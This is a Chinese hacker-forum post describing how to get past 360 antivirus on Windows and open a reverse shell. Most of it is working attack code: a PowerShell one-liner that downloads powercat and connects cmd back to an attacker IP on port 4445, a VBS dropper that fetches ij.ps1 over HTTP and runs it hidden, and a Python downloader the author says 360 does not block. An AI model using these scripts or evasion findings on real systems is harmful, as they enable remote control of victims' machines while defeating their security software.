跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

vbs绕过360用ps1反弹shell

CNHAT
CNHAT
WEB和服务器安全漏洞

精选回复

发布于

前言

中午开始想从360手上搞点好果汁吃。奈何360太流氓,一句拦截行天下

得出来的结果 

360不拦截本机执行powershell,但是拦截其他进程调用powershell
cmd也是一个道理

是先执行被拦截的进程,被检测到然后360结束进程

vbs下载只有下载保存的文件后缀不为hta、exe就不会被拦截,可以保存为txt、ps1
有360的机子,不能将文件重命名为exe、hta
但是,用系统本身存在的功能进行远程下载它会拦截,用第三方的远程下载器并不会拦截
360对powershell拦截的不是内容,拦截的是参数

ijps1
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.241.147 -p 4445 -e cmd

 

vbs 

Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://192.168.3.4/ij.ps1"
'发送请求
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
'等待3秒,等文件下载
wscript.sleep 3000 
aGet.Write(post.responseBody)'写数据
aGet.SaveToFile "ij.ps1",2

set ws=wscript.createobject("wscript.shell")
ret=ws.run ("powershell -nologo -file ij.ps1" ,3,true)

 

测试结果:

elTNkV.md.gif
elTNkV.md.gif

PS:绕过是绕过,但是是落地执行

py下载器 

import requests
import optparse
import os

class zx(object):
    def __init__(self,command):
        self.command=command

    def __call__(self,zx):
        def wt(*args,**kwargs):
            print('[+] 开始下载')
            try:
                rqt=requests.get(url=args[0],headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'},timeout=3)
                global value
                value=len(rqt.content)
                dk=open(args[1],'wb')
                dk.write(rqt.content)
                dk.close()
            except:
                pass
            if os.path.exists(args[1]):
                jd=len(open(args[1],'rb').read())
                if jd==value:
                    print('[+] 文件:{}下载成功'.format(args[1]))
                else:
                    print('[-] 文件:{}下载失败,失败原因:大小不一致'.format(args[1]))
            else:
                print('[-] 文件下载失败')
            return zx(*args,**kwargs)
        return wt

@zx(command='calc')
def download(url,file):
    pass

def demo():
    usage='download.py -u [url] -s [save_filename]'
    parsersq=optparse.OptionParser(usage)
    parsersq.add_option('-u',dest='url',help='指定要下载的URL路径')
    parsersq.add_option('-s',dest='file_name',help='保存为什么名称')
    (options,args)=parsersq.parse_args()
    if options.url and options.file_name:
        download(options.url,options.file_name)
    else:
        parsersq.print_help()
        exit()

if __name__ == '__main__':
    demo()

 

结果:

elTbAP.png
elTbAP.png

360并没有拦截

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。